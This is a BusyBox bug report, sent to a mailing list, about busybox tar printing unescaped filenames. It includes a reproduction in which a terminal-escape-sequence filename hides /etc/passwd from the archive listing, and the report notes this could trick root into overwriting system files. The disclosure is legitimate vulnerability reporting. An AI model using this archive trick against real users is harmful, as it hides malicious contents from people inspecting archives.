[Bug 16018] New: busybox tar allows un-escaped filenames to be printed to stdout/stderr
bugzilla at busybox.net
bugzilla at busybox.net
Wed Apr 3 14:02:42 UTC 2024
https://bugs.busybox.net/show_bug.cgi?id=16018
Bug ID: 16018
Summary: busybox tar allows un-escaped filenames to be printed
to stdout/stderr
Product: Busybox
Version: 1.30.x
Hardware: All
OS: All
Status: NEW
Severity: major
Priority: P5
Component: Other
Assignee: unassigned at busybox.net
Reporter: ian.norton at entrust.com
CC: busybox-cvs at busybox.net
Target Milestone: ---
It is possible to create an archive with filenames that are terminal escape
sequences and use this to hide other files from the file list or verbose
output.
The example output below is from running inside ubuntu 22.04 using busybox
1.30.1
root at 1f91a2b8747c:/tmp/hack# ls -l
total 0
-rw-r--r-- 1 root root 0 Apr 3 13:30
''$'\033''[1A'$'\033''[1Ksome-innocent-filename.txt'
-rw-r--r-- 1 root root 0 Apr 3 13:31 some-innocent-filename.txt
root at 1f91a2b8747c:/tmp/hack# busybox tar -cf ../bad.tar /etc/passwd $(echo -e
'\033[1A\033[1Ksome-innocent-filename.txt') some-innocent-filename.txt
tar: removing leading '/' from member names
busybox will not report the etc/passwd item
root at 1f91a2b8747c:/tmp/hack# busybox tar -tf ../bad.tar
some-innocent-filename.txt
some-innocent-filename.txt
GNU tar will correctly report the escaped version of each member
root at 1f91a2b8747c:/tmp/hack# tar -tf ../bad.tar
etc/passwd
\033[1A\033[1Ksome-innocent-filename.txt
some-innocent-filename.txt
If a root user were to use busybox to untar files from / you could see how this
could be abused to unwittingly overwrite root files even if the listed the tar
content first.
--
You are receiving this mail because:
You are on the CC list for the bug.
More information about the busybox-cvs
mailing list